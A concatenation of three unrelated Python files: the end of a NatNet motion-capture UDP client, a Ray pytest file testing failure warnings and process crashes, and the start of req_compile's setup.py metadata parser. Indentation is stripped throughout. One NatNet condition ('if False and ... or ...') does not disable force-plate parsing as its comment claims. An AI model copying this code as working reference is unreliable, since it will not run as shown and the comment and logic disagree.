trace("Rigid Body ID:", rigid_body_id)
# Position and orientation
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tPosition:", pos[0], ",", pos[1], ",", pos[2])
rot = Quaternion.unpack(data[offset:offset + 16])
offset += 16
trace("\tOrientation:", rot[0], ",", rot[1], ",", rot[2], ",", rot[3])
# Send information to any listener.
if self.rigid_body_listener is not None:
self.rigid_body_listener(rigid_body_id, pos, rot)
trace("\tPosition:", pos[0], ",", pos[1], ",", pos[2])
# RB marker data (before version 3.0; from version 3.0 on, marker data lives in the description)
if self.__nat_net_stream_version[0] < 3 and self.__nat_net_stream_version[0] != 0:
# Marker count (4 bytes)
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
marker_count_range = range(0, marker_count)
trace("\tMarker Count:", marker_count)
# Marker positions
for i in marker_count_range:
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tMarker", i, ":", pos[0], ",", pos[1], ",", pos[2])
if self.__nat_net_stream_version[0] >= 2:
# Marker ID's
for i in marker_count_range:
marker_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\tMarker ID", i, ":", marker_id)
# Marker sizes
for i in marker_count_range:
size = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("\tMarker Size", i, ":", size[0])
if self.__nat_net_stream_version[0] >= 2:
marker_error, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("\tMarker Error:", marker_error)
# Version 2.6 and later
if (((self.__nat_net_stream_version[0] == 2) and (self.__nat_net_stream_version[1] >= 6)) or
self.__nat_net_stream_version[0] > 2 or self.__nat_net_stream_version[0] == 0):
param, = struct.unpack('h', data[offset:offset + 2])
tracking_valid = (param & 0x01) != 0
offset += 2
trace("\tTracking Valid:", 'True' if tracking_valid else 'False')
return offset
# Unpack a skeleton object from a data packet
def __unpack_skeleton(self, data):
offset = 0
skeleton_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Skeleton ID:", skeleton_id)
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Rigid Body Count:", rigid_body_count)
for j in range(0, rigid_body_count):
offset += self.__unpack_rigid_body(data[offset:])
return offset
# Unpack data from a motion capture frame message
def __unpack_mocap_data(self, data):
trace("Begin MoCap Frame\n-----------------\n")
data = memoryview(data)
offset = 0
# Frame number (4 bytes)
frame_number = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Frame:", frame_number)
# Marker set count (4 bytes)
marker_set_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Marker Set Count:", marker_set_count)
for i in range(0, marker_set_count):
# Model name
model_name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(model_name) + 1
trace("Model Name:", model_name.decode('utf-8'))
# Marker count (4 bytes)
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Marker Count:", marker_count)
for j in range(0, marker_count):
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
# trace( "\tMarker", j, ":", pos[0],",", pos[1],",", pos[2] )
# Unlabeled markers count (4 bytes)
unlabeled_markers_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Unlabeled Markers Count:", unlabeled_markers_count)
for i in range(0, unlabeled_markers_count):
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tMarker", i, ":", pos[0], ",", pos[1], ",", pos[2])
# Rigid body count (4 bytes)
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Rigid Body Count:", rigid_body_count)
for i in range(0, rigid_body_count):
offset += self.__unpack_rigid_body(data[offset:])
# Version 2.1 and later
skeleton_count = 0
if not (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] > 0) \
or self.__nat_net_stream_version[0] > 2:
skeleton_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Skeleton Count:", skeleton_count)
for i in range(0, skeleton_count):
offset += self.__unpack_skeleton(data[offset:])
# Labeled markers (Version 2.3 and later)
labeled_marker_count = 0
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] > 3) \
or self.__nat_net_stream_version[0] > 2:
labeled_marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Labeled Marker Count:", labeled_marker_count)
for i in range(0, labeled_marker_count):
labeled_marker_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
size = FloatValue.unpack(data[offset:offset + 4])
offset += 4
# Version 2.6 and later
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 6) \
or self.__nat_net_stream_version[0] > 2:
param, = struct.unpack('h', data[offset:offset + 2])
offset += 2
occluded = (param & 0x01) != 0
point_cloud_solved = (param & 0x02) != 0
model_solved = (param & 0x04) != 0
# Version 3.0 and later
if self.__nat_net_stream_version[0] >= 3:
residual, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("Residual:", residual)
# TODO: force plate parsing fails with the BME MotionLab stream, so it is disabled via the 'if False' below
# Force Plate data (version 2.9 and later)
if False and (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 9) \
or self.__nat_net_stream_version[0] > 2:
force_plate_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Force Plate Count:", force_plate_count)
for i in range(0, force_plate_count):
# ID
force_plate_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Force Plate", i, ":", force_plate_id)
# Channel Count
force_plate_channel_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Channel Data
for j in range(0, force_plate_channel_count):
trace("\tChannel", j, ":", force_plate_id)
force_plate_channel_frame_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for k in range(0, force_plate_channel_frame_count):
force_plate_channel_val = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\t\t", force_plate_channel_val)
# Device data (version 2.11 and later)
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 11) \
or self.__nat_net_stream_version[0] > 2:
device_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Device Count:", device_count)
for i in range(0, device_count):
# ID
device_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Device", i, ":", device_id)
# Channel Count
device_channel_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Channel Data
for j in range(0, device_channel_count):
trace("\tChannel", j, ":", device_id)
device_channel_frame_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for k in range(0, device_channel_frame_count):
device_channel_val = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\t\t", device_channel_val)
# time_code
time_code = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
time_code_sub = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
# Timestamp (increased to double precision in 2.7 and later)
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] >= 7) \
or self.__nat_net_stream_version[0] > 2:
timestamp, = DoubleValue.unpack(data[offset:offset + 8])
offset += 8
else:
timestamp, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
# Hires Timestamp (Version 3.0 and later)
if self.__nat_net_stream_version[0] >= 3:
stamp_camera_exposure = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
stamp_data_received = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
stamp_transmit = int.from_bytes(data[offset:offset + 8], byteorder='little')
offset += 8
# Frame parameters
param, = struct.unpack('h', data[offset:offset + 2])
is_recording = (param & 0x01) != 0
tracked_models_changed = (param & 0x02) != 0
offset += 2
# Send information to any listener.
if self.new_frame_listener is not None:
self.new_frame_listener(frame_number, marker_set_count, unlabeled_markers_count, rigid_body_count,
skeleton_count, labeled_marker_count, time_code, time_code_sub, timestamp,
is_recording, tracked_models_changed)
# Unpack a marker set description packet
def __unpack_marker_set_description(self, data):
offset = 0
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("Markerset Name:", name.decode('utf-8'))
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, marker_count):
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
return offset
# Unpack a rigid body description packet
def __unpack_rigid_body_description(self, data):
offset = 0
# Version 2.0 or higher
if self.__nat_net_stream_version[0] >= 2:
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tRigidBody Name:", name.decode('utf-8'))
rigid_body_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
parent_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
timestamp = Vector3.unpack(data[offset:offset + 12])
offset += 12
# Version 3.0 and higher, rigid body marker information contained in description
if self.__nat_net_stream_version[0] >= 3 or self.__nat_net_stream_version[0] == 0:
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\tRigidBody Marker Count:", marker_count)
marker_count_range = range(0, marker_count)
for marker in marker_count_range:
marker_offset = Vector3.unpack(data[offset:offset + 12])
offset += 12
for marker in marker_count_range:
active_label = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
return offset
# Unpack a skeleton description packet
def __unpack_skeleton_description(self, data):
offset = 0
name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(name) + 1
trace("\tMarker Name:", name.decode('utf-8'))
skeleton_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, rigid_body_count):
offset += self.__unpack_rigid_body_description(data[offset:])
return offset
# Unpack a data description packet
def __unpack_data_descriptions(self, data):
offset = 0
dataset_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
for i in range(0, dataset_count):
data_type = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
if data_type == 0:
offset += self.__unpack_marker_set_description(data[offset:])
elif data_type == 1:
offset += self.__unpack_rigid_body_description(data[offset:])
elif data_type == 2:
offset += self.__unpack_skeleton_description(data[offset:])
def __data_thread_function(self, socket):
while True:
# Block for input
data, addr = socket.recvfrom(32768) # 32k byte buffer size
if len(data) > 0:
self.__process_message(data)
def __process_message(self, data):
trace("Begin Packet\n------------\n")
message_id = int.from_bytes(data[0:2], byteorder='little')
trace("Message ID:", message_id)
packet_size = int.from_bytes(data[2:4], byteorder='little')
trace("Packet Size:", packet_size)
offset = 4
if message_id == self.NAT_FRAMEOFDATA:
self.__unpack_mocap_data(data[offset:])
elif message_id == self.NAT_MODELDEF:
self.__unpack_data_descriptions(data[offset:])
elif message_id == self.NAT_PINGRESPONSE:
offset += 256 # Skip the sending app's Name field
offset += 4 # Skip the sending app's Version info
self.__nat_net_stream_version = struct.unpack('BBBB', data[offset:offset + 4])
trace("NatNet Stream Version:", self.__nat_net_stream_version)
offset += 4
elif message_id == self.NAT_RESPONSE:
if packet_size == 4:
command_response = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
else:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Command response:", message.decode('utf-8'))
elif message_id == self.NAT_UNRECOGNIZED_REQUEST:
trace("Received 'Unrecognized request' from server")
elif message_id == self.NAT_MESSAGESTRING:
message, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(message) + 1
trace("Received message from server:", message.decode('utf-8'))
else:
trace("ERROR: Unrecognized packet type")
trace("End Packet\n----------\n")
def send_command(self, command, command_str, command_socket, address=None):
if address is None:
address = (self.server_ip_address, self.command_port)
# Compose the message in our known message format
if command == self.NAT_REQUEST_MODELDEF or command == self.NAT_REQUEST_FRAMEOFDATA:
packet_size = 0
command_str = ""
elif command == self.NAT_REQUEST:
packet_size = len(command_str) + 1
elif command == self.NAT_PING:
command_str = "Ping"
packet_size = len(command_str) + 1
else:
packet_size = len(command_str) + 1
data = command.to_bytes(2, byteorder='little')
data += packet_size.to_bytes(2, byteorder='little')
data += command_str.encode('utf-8')
data += b'\0'
trace("Command:", data)
command_socket.sendto(data, address)
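# Sketch: for NAT_PING the datagram built above is b'\x00\x00' (message id 0),
# b'\x05\x00' (payload size 5), b'Ping' and a trailing NUL - the same
# id/size header layout that __process_message parses in replies.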
def run(self):
# TODO: not working with BME MoCap
# Create the command socket
self.command_socket = self.__create_command_socket()
if self.command_socket is None:
print("Could not open command channel")
return
# Create a separate thread for receiving command packets
command_thread = Thread(target=self.__data_thread_function, args=(self.command_socket,))
command_thread.start()
# Request NatNet streaming version
self.send_command(self.NAT_PING, "", self.command_socket)
# Request model
self.send_command(self.NAT_REQUEST_MODELDEF, "", self.command_socket)
# Request frame of data
self.send_command(self.NAT_REQUEST_FRAMEOFDATA, "", self.command_socket)
# Create the data socket
self.data_socket = self.__create_data_socket(self.data_port)
if self.data_socket is None:
print("Could not open data channel")
return
# Create a separate thread for receiving data packets
data_thread = Thread(target=self.__data_thread_function, args=(self.data_socket,))
data_thread.start()
if __name__ == '__main__':
# This is a callback function that gets connected to the NatNet client and called once per mocap frame.
def receive_new_frame(frame_number, marker_set_count, unlabeled_markers_count, rigid_body_count,
skeleton_count, labeled_marker_count, time_code, time_code_sub, timestamp,
is_recording, tracked_models_changed):
print("Received frame", frame_number)
# This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
def receive_rigid_body_frame(id, position, rotation):
print("Received frame for rigid body", id)
# This will create a new NatNet client
streamingClient = NatNetClient("192.168.1.153", "192.168.1.30")
# Configure the streaming client to call our handlers for each new frame and each rigid body.
streamingClient.new_frame_listener = receive_new_frame
streamingClient.rigid_body_listener = receive_rigid_body_frame
# Start up the streaming client now that the callbacks are set up.
# This will run perpetually, and operate on a separate thread.
streamingClient.run()
|
test_failure_2.py
|
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
import pytest
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray._private.utils
from ray.util.placement_group import placement_group
import ray.ray_constants as ray_constants
from ray.cluster_utils import cluster_not_supported
from ray._private.test_utils import (
init_error_pubsub, get_error_message, get_log_batch, Semaphore,
wait_for_condition, run_string_as_driver_nonblocking)
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
foo = Foo.remote()
print(foo)
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# Placement group cannot be made, but no warnings should occur.
total_cpus = ray.cluster_resources()["CPU"]
# Occupy one cpu by an actor
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
print(a)
@ray.remote(num_cpus=total_cpus)
def g():
pass
pg = placement_group([{"CPU": total_cpus}], strategy="STRICT_PACK")
g.options(placement_group=pg).remote()
errors = get_error_message(
p, 1, ray_constants.INFEASIBLE_TASK_ERROR, timeout=5)
assert len(errors) == 0, errors
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
a = Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
del a
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 10)]
assert len(actor_group1) == num_cpus * 10
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group2) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote(num_cpus=0.25)
def f():
time.sleep(1000)
return 1
@ray.remote(num_cpus=0.25)
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote(num_cpus=0.25)
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray._private.import_thread.logger.
# However, I didn't find a good way to capture the output for all loggers
# simultaneously.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_warning_for_dead_autoscaler(ray_start_regular, error_pubsub):
# Terminate the autoscaler process.
from ray.worker import _global_node
autoscaler_process = _global_node.all_processes[
ray_constants.PROCESS_TYPE_MONITOR][0].process
autoscaler_process.terminate()
# Confirm that we receive an autoscaler failure error.
errors = get_error_message(
error_pubsub, 1, ray_constants.MONITOR_DIED_ERROR, timeout=5)
assert len(errors) == 1
# Confirm that the autoscaler failure error is stored.
error = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
assert error is not None
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(object_ref)
thread.join()
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ReferenceCountingAssertionError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = ray_start_cluster
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"gcs_rpc_server_reconnect_timeout_s": 100
}
}],
indirect=True)
def test_gcs_server_failure_report(ray_start_regular, log_pubsub):
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
# wait for 30 seconds, for the 1st batch of logs.
batches = get_log_batch(log_pubsub, 1, timeout=30)
assert len(batches) == 1
assert batches[0]["pid"] == "gcs_server", batches
def test_raylet_node_manager_server_failure(ray_start_cluster_head,
log_pubsub):
cluster = ray_start_cluster_head
redis_port = int(cluster.address.split(":")[1])
# Reuse redis port to make node manager grpc server fail to start.
with pytest.raises(Exception):
cluster.add_node(wait=False, node_manager_port=redis_port)
# wait for max 10 seconds.
def matcher(log_batch):
return log_batch["pid"] == "raylet" and any(
"Failed to start the grpc server." in line
for line in log_batch["lines"])
match = get_log_batch(log_pubsub, 1, timeout=10, matcher=matcher)
assert len(match) > 0
def test_gcs_server_crash_cluster(ray_start_cluster):
# Test the GCS server failures will crash the driver.
cluster = ray_start_cluster
GCS_RECONNECTION_TIMEOUT = 5
node = cluster.add_node(
num_cpus=0,
_system_config={
"gcs_rpc_server_reconnect_timeout_s": GCS_RECONNECTION_TIMEOUT
})
script = """
import ray
import time
ray.init(address="auto")
time.sleep(60)
"""
# Get gcs server pid to send a signal.
all_processes = node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
proc = run_string_as_driver_nonblocking(script)
# Wait long enough to start the driver.
time.sleep(5)
start = time.time()
print(gcs_server_pid)
os.kill(gcs_server_pid, signal.SIGKILL)
wait_for_condition(lambda: proc.poll() is not None, timeout=10)
# Make sure the driver was exited within the timeout instead of hanging.
# * 2 for avoiding flakiness.
assert time.time() - start < GCS_RECONNECTION_TIMEOUT * 2
# Make sure all processes are cleaned up after GCS is crashed.
# Currently, not every process is fate shared with GCS.
# It seems like log monitor, ray client server, and Redis
# are not fate shared.
# TODO(sang): Fix it.
# wait_for_condition(lambda: not node.any_processes_alive())
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
source.py
|
# pylint: disable=exec-used
"""Parsing of metadata that comes from setup.py"""
from __future__ import print_function
import functools
import imp # pylint: disable=deprecated-module
import io
import logging
import os
import os.path
import re
import shutil
import subprocess
import sys
import tempfile
import threading
import time
from contextlib import closing
from types import ModuleType
import pkg_resources
import setuptools # type: ignore
import six
from six import BytesIO, StringIO
from six.moves import configparser
from req_compile import utils
from req_compile.errors import MetadataError
from req_compile.filename import parse_source_filename
from ..containers import DistInfo, PkgResourcesDistInfo
from .dist_info import _fetch_from_wheel
from .extractor import NonExtractor
from .patch import begin_patch, end_patch, patch
LOG = logging.getLogger("req_compile.metadata.source")
WHEEL_TIMEOUT = float(os.getenv("REQ_COMPILE_WHEEL_TIMEOUT", "30.0"))
EGG_INFO_TIMEOUT = float(os.getenv("REQ_COMPILE_EGG_INFO_TIMEOUT", "15.0"))
FAILED_BUILDS = set()
THREADLOCAL = threading.local()
def find_in_archive(extractor, filename, max_depth=None):
if extractor.exists(filename):
return filename
for info_name in extractor.names():
if info_name.lower().endswith(filename) and (
max_depth is None or info_name.count("/") <= max_depth
):
if "/" not in filename and info_name.lower().rsplit("/")[-1] != filename:
continue
return info_name
return None
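# Example (sketch): find_in_archive(extractor, "setup.py", max_depth=1) matches
# "pkg-1.0/setup.py", but skips "pkg-1.0/examples/setup.py" (nested too deep)
# and "pkg-1.0/not_setup.py" (the basename must equal the requested filename
# when no "/" is given).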
def _fetch_from_source(source_file, extractor_type, run_setup_py=True):
"""
Args:
source_file (str): Path to the source archive or directory
extractor_type (type[Extractor]): Type of extractor to use
run_setup_py (bool): Whether to try extracting metadata by running setup.py first
Returns:
(DistInfo) Metadata extracted from the source distribution
"""
if not os.path.exists(source_file):
raise ValueError("Source file/path {} does not exist".format(source_file))
name, version = parse_source_filename(os.path.basename(source_file))
if source_file in FAILED_BUILDS:
raise MetadataError(name, version, Exception("Build has already failed before"))
extractor = extractor_type(source_file)
with closing(extractor):
if run_setup_py:
LOG.info("Attempting to fetch metadata from setup.py")
results = _fetch_from_setup_py(source_file, name, version, extractor)
if results is not None:
return results
else:
extractor.fake_root = None
LOG.warning(
"No metadata source could be found for the source dist %s", source_file
)
FAILED_BUILDS.add(source_file)
raise MetadataError(name, version, Exception("Invalid project distribution"))
def _fetch_from_setup_py(
source_file, name, version, extractor
): # pylint: disable=too-many-branches
